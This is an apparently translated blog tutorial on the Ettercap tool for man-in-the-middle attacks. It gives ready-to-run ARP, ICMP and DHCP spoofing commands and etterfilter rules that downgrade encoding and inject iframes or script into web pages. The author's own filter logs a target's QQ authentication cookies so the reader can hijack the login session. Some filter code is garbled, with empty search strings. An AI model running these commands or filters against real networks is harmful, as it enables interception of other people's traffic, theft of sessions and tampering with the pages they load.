Ettercap brief introduction to the principle and instructions for use
hudson
0x078A
December 18th, 2021

0x01 ettercap interface introduction

Ettercap has four interfaces, Text, Curses, GTK2, and Daemonize.

The Text interface is equivalent to what we often call the command line interface, which only displays characters. The startup parameter is -T. Usually it is accompanied by the parameter -q. (quiet mode) If this option is added, the contents of the captured packets will not be displayed.
Curses and GTK2 is a graphical interface, you can use the mouse point, here skipped ...
Daemonize is the guardian mode, equivalent to running in the background.

The Text interface will be introduced in future examples.

0x02 ettercap running mode

Ettercap has two modes of operation, UNIFIED and BRIDGED.

Among them, UNIFIED way is to sniff in a man-in-the-middle way; BRIDGED way is to sniff the packets between two NICs in a dual NIC case.

The general principle of the UNIFIED approach is to trick both A and B to send the packets originally intended for the other party to the third party C, which then forwards them to the target. In this way, C acts as a middleman. The UNIFIED approach will complete the above deception and analyze the packets. Ettercap is hijacking the communication between A and B. In the eyes of Ettercap, the relationship between A and B is reciprocal.

The BRIDGED approach is a bit like having two NICs on a laptop, a wired NIC and a wireless NIC. We can share the internet connection from the wired NIC to the wireless NIC, so that the laptop becomes a wireless ap. all the data traffic generated by the wireless NIC will be transmitted to the wired NIC. the BRIDGED approach ettercap sniffs the packets between these two NICs.

In general, we will use the UNIFIED method. Its runtime parameter is -M (M is the initials of MITM, which stands for man-in-the-middle attack).

0x03 ettercap target selection

The targets are expressed in the form of MACs/IPs/PORTS, and according to this rule, we can pinpoint the targets to specific hosts and ports.
MAC, IP, and PORT are the three conditions, and empty means ANY, which means all. I personally understand that the three conditions are in relation to each other, i.e. sniffing for targets where all three conditions hold at the same time. For example, "//80" means sniffing port 80 on any MAC, any IP.
Generally, the MAC part is left blank, unless you are willing to go through the long list of MAC addresses manually. Therefore, we can use only the IP part to determine the target host.

When there are multiple IPs, you can use "," to separate different C-segment IPs, you can use "-" to indicate consecutive IPs, and you can use ";" to separate different expressions of IPs. Examples are as follows.
"10.0.0.1-5;10.0.1.33" means ip 10.0.0.1, 2, 3, 4, 5 and 10.0.1.33
The port section is written in a similar way, see the example.
"20-25,80,110" means 20, 21, 22, 23, 24, 25, 80 and 110

0x04 ettercap's man-in-the-middle attack

When we specify the -M parameter, i.e. man-in-the-middle attack, we can have the following types of attacks.

  1. man-in-the-middle attack with arp poisoning

The principle of arp poisoning is simply to forge the correspondence between MAC address and IP, causing packets to be passed out by a man-in-the-middle. For details, please see.
http://www.2cto.com/Article/201207/144532.html

There are two ways of arp poisoning: bidirectional (remote) and unidirectional (oneway).
The two-way approach will poison the ARP cache of both targets and listen to the communication between them. The one-way approach will only listen to the contents of the one-way communication from the first target to the second target. Generally, we will choose to use the two-way spoofing approach to get all the packets for sniffing and analysis.
For example: -M arp:remote /10.0.0.2/ // means sniff all the communication on port 10.0.0.2, including outgoing packets and received packets.

What if the target host has ARP firewall enabled? Direct spoofing will trigger an alarm and has no effect. This is the time when one-way ARP poisoning comes into play. As long as the router is not bound to IP and MAC, we can just spoof the router, so that the packets sent from the router to the target host go through the middleman and complete our attack.

  1. icmp spoofing

icmp spoofing is a redirect-based routing spoofing technique. The basic principle is to trick other hosts that this machine is the nearest route, so other hosts will send packets to this machine, and then this machine will redirect them to the real router. Thus, we can then listen to these packets.
icmp spoofing is not applicable in the environment under the switch. If the local machine is in the environment of the switch, then it is better to choose the arp poisoning method to carry out the attack.
The parameters of the icmp spoofing method are the MAC and IP of the real router. the parameters are of the form (MAC/IP). Examples are as follows.
-M icmp:00:11:22:33:44:55/10.0.0.1

  1. DHCP spoofing

The basic principle of DHCP spoofing is to disguise as a DHCP server to dynamically assign IPs to new hosts instead of the real DHCP server, the disadvantage of this is that it may duplicate the IPs assigned by the real DHCP server and cause conflicts, and it can only target the new hosts, not the previous ones.
The parameters of the DHCP spoofing method are the pool of ip addresses that can be assigned out, subnet mask and DNS. the parameters are in the form of (ip_pool/netmask/dns). Examples are as follows.
-M dhcp:192.168.0.30,35,50-60/255.255.255.0/192.168.0.1
Corresponding to the meaning of 192.168.0.30,35,50-60 will be assigned among the addresses, subnet mask of 255.255.255.0, DNS server for 192.168.0.1.

  1. Port Stealing

This attack is applicable to the environment under the switch, and the router in the ip and mac binding can not be arp spoofing. The basic idea is that since it is not possible to spoof the IP and MAC correspondence of the router, then it is possible to spoof the switch. In this way, the packets that should have reached the target host through one of the switch's ports are passed into the attacker's port. (This part of the author's understanding is not good, I implore the bully to add correction!)
Because this method can only be used in the switch environment, and will generate a large number of packets, seriously affecting the network conditions, before using must think twice.

I only tested the actual 1 and 4 two types of attacks. The results of the 1 way attack fully meet expectations, while the 4 way generated the following errors: 1.

  1. ERROR : 90, Message too long
  2. [ec_send.c:send_to_L2:213]
  4. libnet_write 1586 (-1): libnet_write_link(): only -1 bytes written (Message too long)
    Copy code
    Also, if you want to use ettercap as a middleman and use other software to sniff data, you should add the -o (only-mitm) parameter.

Note.
Ettercap does not forward packets, it is the OS that forwards packets, so you need to enable OS packet forwarding during man-in-the-middle attacks.
For more information, see http://www.cnblogs.com/gunl/archive/2010/09/14/1826234.html

0x05 Common parameters and combinations for ettercap

-I Show available NICs
-i Select NIC
-t protocol selection, tcp/udp/all, default is all
-p No poisoning attack, used to sniff local packets
-F load filter file
-V text display packets as text on screen
-L filename saves all packets (the resulting file can only be displayed with etterlog)

A few common combinations of parameters are listed below.
ettercap -Tzq
Displayed as command line, sniffs only local packets, displays only the captured username and password and other information.
ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.2-10/
Sniff packets communicated between the gateway (192.168.1.1) and some hosts (192.168.1.2-10) to each other.
ettercap -Tzq //110
Only sniff the local port 110 (pop3)
ettercap -Tzq /10.0.0.1/21,22,23
Sniff only local communication with 10.0.0.1 host on ports 21, 22, 23
ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /10.1.1.2/80 //
Use your own filter on eth0 to sniff all traffic on port 80 from host 10.1.1.2, and save all packets to a file named "sniffed_data"
ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /10.1.1.1/ /10.1.1.2/
One-way spoofed route to hijack only packets sent from the route to 10.1.1.2.

0x06 ettercap filter writing

A good tool with a good filtering rule is perfect!

Ettercap's filter rules can only be loaded into ettercap with the -F parameter after compilation.
The command to compile a filter rule is
etterfilter filter.ecf -o filter.ef.
That is, the filter.ecf file is compiled into a filter.ef file that ettercap will recognize.
The syntax of the filtering rules is similar to C, but only if statements are available, no loop statements are supported. One thing to note is that there must be a space between if and "(" and the curly brackets {} cannot be omitted.

Some of the common functions provided by Ettercap are
search(where, what) finds what from the string where, and returns true if found
regex(where, regex) matches the regular expression regex from the string where, and returns true if found
replace(what, with) replace the string what with the string with
log(what, where) logs the string what to the where file
msg(message) displays the message string on the screen
exit() exit

To quickly learn how to write etterfilter rules, my personal habit is to read some existing rule examples, and then follow them to write my own filter.
The classic examples I saw on the blog are: 1.

  1. if (ip.proto == TCP && ip.dst ! = '192.1.1.200' && tcp.dst == 80 || tcp.dst == 8080) {
  2. #... . ...and if it contains an Accept-Encoding header...
  3. if (search(DATA.data, "Accept-Encoding")) { 4.
  4. #... .remove any Encoding (make sure we are using plain text)
  5. replace("Accept-Encoding", "Accept-Nothing!");
  6. }
  7. }
  8. #--Inject Iframe-- 9.
  9. if (ip.proto == TCP && ip.dst ! = '192.1.1.200' && tcp.src == 80 || tcp.src == 8080) {
  10. if (search(DATA.data, "")){
  11. #Replace it with the body tag and an iframe to our attacking webpage
  12. replace("","");
  13. msg("iframe injected after \n");
  14. }
  15. if (search(DATA.data, "")){
  16. replace("","<IFRAME

In the above code, the first part is to replace the Accept-Encoding part in the HTTP request header, so that the data returned by the WebServer is the original data, not the compressed (e.g. gzip) data, which is convenient for us to sniff and analyze. The second part is to find the and tags in the returned data, and add an iframe tag after it.
From this example, we can see that the main role of the filter is to find the fields in the data and replace them. Therefore, on the web we often see examples used to hang horses or insert a piece of js script to do whatever xss can do.
See http://fuzzexp.org/ettercap-filter-rules-send.html for more rules

I would like to present a filtering rule of my own to record cookies on specific websites.

  1. if (ip.proto == TCP && tcp.dst == 80 && ip.src == '10.0.0.2' ) {
  2. if (search(DATA.data, "Accept-Encoding")) {
  3. replace("Accept-Encoding", "Accept-Mousecat");
  4. }
  5. if ( search(DATA.data, "Cookie:") ) {
  6. if (search(DATA.data, "qq")) {
  7. #"qq" can be replaced with other website keywords
  8. log(DATA.data, "/tmp/qqlog.txt");
  9. }
  10. }
  11. }

This filtering rule can get two cookies used by Tencent for authentication: skey and uin, and then you can fake login status to do whatever you want. This is more straightforward than the xss cookie and is not interfered with by http-only.
There is another purely cute one: 1.

  1. if (ip.proto == TCP && tcp.dst == 80 ) {
  2. if (search(DATA.data, "Accept-Encoding")) {
  3. replace("Accept-Encoding", "Accept-Mousecat");
  4. }
  5. replace("", "alert(/h4cked by deleter/)");
  6. }

Every time a page is opened a dialog box will pop up to be cute...

Points to note.
Ettercap needs to be run with root privileges, but it will downgrade to nobody after opening the link layer socket, so choose a directory with write access when generating the log file, such as /tmp/

0x07 etterlog analysis data

Etterlog is used to read and analyze the log file generated by ettercap -L or -l parameter. This part of the command is not introduced, personally I think the most commonly used commands are etterlog -A sniffed_data.ecp >1.txt The log data generated by ettercap is converted to displayable data and saved in 1.txt. etterlog -B sniffed_data.ecp >1.data Dump the data as is into a file.

0x08 References & Further Reading

The most helpful official manuals.
http://linux.die.net/man/8/ettercap
http://linux.die.net/man/8/etterlog
http://linux.die.net/man/8/etterfilter

Breaking ssl sniffing passwords with sslstrip and ettercap
http://www.2cto.com/Article/201009/75322.html
Man-in-the-middle attack demonstration and prevention against SSL
http://www.2cto.com/Article/201211/169512.html
Man-in-the-middle attack-ARP poisoning
http://www.2cto.com/Article/201207/144532.html

Subscribe to hudson
Receive the latest updates directly to your inbox.
Verification
This entry has been permanently stored onchain and signed by its creator.
Arweave Transaction
iHvinXCDKuPwk1E…ul7ardI4TGbv32w
Author Address
0x078Ad5270b0240D…5A271Fc6E2b2bD8
Content Digest
DjZ__UpSFP6vsRy…4urT1S7nidWCSXU
More from hudson
View All

Skeleton

Skeleton

Skeleton